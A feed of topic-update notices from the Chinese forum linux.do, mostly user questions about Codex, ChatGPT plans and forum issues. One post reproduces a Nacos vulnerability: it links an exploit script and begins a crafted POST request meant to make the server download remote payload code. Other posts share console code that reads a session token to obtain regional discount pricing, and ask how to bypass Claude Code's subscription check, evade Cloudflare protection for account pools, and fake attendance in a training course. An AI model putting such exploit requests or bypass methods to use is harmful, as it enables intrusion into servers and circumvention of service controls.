https://linux.do 论坛的话题更新通知频道。
fkalisnacos漏洞复现分析 中发帖

刚刚发的文章被删了,还是发一些之前的其他的简单文章吧,刚刚加入大家见谅 

个人理解的漏洞原理:本质实际上就是在20年那个未授权的基础上添加了命令执行,但是也导致了该漏洞的利用条件变得比较苛刻,目前测试需要比较多的条件才能进行漏洞利用** 
1. 0day作者的poc地址
https://github.com/ayoundzw/nacos-poc/blob/main/exploit.py 
2. poc提取
根据作者的poc,其本质上就是两种poc数据包,下面的poc并不一定可以直接使用,下面漏洞分析的时候会解答 

利用该poc去服务器地址远程下载payload代码

POST /nacos/v1/cs/ops/data/removal HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: python-requests/2.31.0
Accept-En...
@vons询问各位大佬,企业微信,非内部群组,机器人能否接入 中发帖

询问各位大佬,企业微信,非内部群组,机器人能否接入
Neo还FLAG,猛男粉是真有 中发帖

佬友是会起哄架秧子的,随便说点啥都能成FLAG了。 
我是那放鸽子的人吗?不过是这几天实在太忙,不得空罢了。 
现在空下来就来还FLAG,还有其他猛男粉的佬友呢,集合一下。 
 [IMG6055]
limkurn咨询下gpt 5x和20x的生图数量限制和codex额度限制 中发帖

有大佬测过5x和20x plan可以生成多少图片?以及codex大概可以用多少额度
lingxuiyucodex free额度询问 中发帖

我当前让codex自己算消耗的额度…42个账号5个30多刀,80%以上都有10刀 
这个数据正常吗?还是ai自己算的有问题
凯尔特人总冠军 (@xiangxihenli)我开的这个gpt team 是2个人还是3个人?下次账单还是两个人吗? 中发帖

我是新注册了一个gpt账号,然后订阅了优惠的48个月的2个座位的team,然后添加了两个邮箱进组,我看管理页面显示 3/2 seats in use, 这个意思是我用了的3个席位吗? 
 [image]
verbal (@canglang)论坛下载附件名乱码 中发帖

下载附件名字是乱码,有没有什么方案可以解决? 
看了论坛里的几个油猴脚本,好像都失效了。 
 [image]
七叶怀瑾 (@chesten)佬友们统计一下,是不是降智的GPT都会输出这个emoji 中发帖

[image] 
如图,这个蓝框数字的emoji,已经给我看出ptsd了。。。 
用着用着pro突然给我来了这个我就知道肯定要拉托大的了 🫠 
一开始的时候以为是我的问题,但直觉告诉我回答不至于这么点不到点子上啊 
又重试了一下,确实是降智了。 
(甚至这是我在Pro号里面用entend pro问的时候出现的 🫪 
奥特曼你在干什么?! 
遇见这种数字emoji的时候伴随降智情况吗?
投票
Muse (@preacher)拾起google/opensk,再次阅读文档发现似乎也有不错的安全性 ? 中发帖

发现有这么一段话,似乎是可以提高对 时间侧信道攻击 抵抗能力。 

The RustCrypto interface. Deploy with . Note that our own ECC implementation is faster and has smaller binary size, so not all boards support RustCrypto yet.--rust-crypto

google/OpenSK/tree/2.0  是有FIDO联盟L1认证,不过目前比较稳健的方案,opensk 2.1 在功能上是最佳选择。 

昨天下单了一个 nRF52840 开发板,准备再试试。 (去年有初步尝试,再次看看吧 😆
glory horizoncodex 右则不显示文件目录结构了 中发帖

今天发现打开codex,右则怎么不显示项目目录结构了,有佬知道是咋回事么 
 [image]
花酒酿 (@Petals)codex whatsapp接码问题 中发帖

有没有佬解答一下,codex号401了之后接码,直接发送到whatsapp可以接到吗,还是只能用英国号创建加邮箱了啊 
 [image]
󠅕󠅣 (@ryder)分享一下注册ChatGPT Business THB TH 泰国的心得 中发帖

首先我是参考这个文章的 
https://linux.do/t/topic/2092962 
通过泰国的邀请码 折扣码进入打折页面 
 [PixPin2026-05-1117-41-32] 
打开F12 设置允许粘贴 下面的代码是一位老哥提供的 感谢他哈 
(async function () {
    console.log(" 正在为 thinkingmachinesth 生成泰国版支付长链接...");
    try {
        const session = await fetch("/api/auth/session").then((r) => r.json());
        if (!session.accessToken) {
            throw new Error("无法获取 Token,请确保已登录 ChatGPT");
        ...
@lihengCherry Studio调用Image-2生成的图像不能通过对话修改吗 中发帖

[image] 
只能生成图片,没办法修改,这种应该怎么处理呢
@DanielxD180大家体验了Codex的Memories了吗 效果怎么样 中发帖

如题,最近更新了Memories功能,不知道效果如何
EmmaStone63codex的自动化功能 中发帖

最近在参加职称培训,需要学习满一定课时(需要一直学,然后20分钟确认一次,再切换课程),然后现在我在codex里面创建了computer use。但是他回复我的是这通常是培训视频,需要验证你本人学习,我只能给你创建20分钟的心跳提醒。    佬们能告诉我怎么解决吗
zero (@yibeibaikaishui)GPT free 号池经常遇到Cloudflare的防护该怎么避免,有没有佬友晓得,求指点 中发帖

环境:CPA + newapi + VPN + Cloudflared + Macmini4 节点搭建号池 
佬友请看图: 
 [image] 
 [image] 
 [image] 
问了AI,说是chatgpt的cloudflare的干的好事。。。 
有没有什么策略,或者手段给cloudflare喂点安眠药 🤣 安静下来…
AvernCF炸了,优选IP全挂 中发帖

刚把脚本搞好在openwet跑,没爽几天,移送线路晚高峰必炸,看来是只能用V6直连了,V6延迟超,就是V4用不了。 
飞牛OS的穿透能白嫖吗,延迟挺低的
麦叨哥 (@madog)Claude Code v2.1.138新装后,增加了订阅验证的过程,请问佬们如何跳过? 中发帖

[1778492615493d] 
如图,新装了最新版的cc,在settings.json中添加了hasCompletedOnboadrding之后,出现了这个,有没有佬知道这个如何跳过?
@QingChang哪里有比较好的大模型八股资源 中发帖

像小红书上有卖大模型八股资料的,不知道靠不靠谱。有没有大家觉得比较好的资源,感激不尽
李华 (@javayetainanle)各位大佬,我整个链路都不太会该怎么办 中发帖

纯纯的萌新,想请教下各位大佬,首先是该用什么模型好,然后是要去哪里买token,是鱼上买月卡嘛,然后是买了也不太会配置,买过deepseekv4但是用ccswitch没配置上。请教一下大佬们帮忙解答一下
Before
After
Back to Top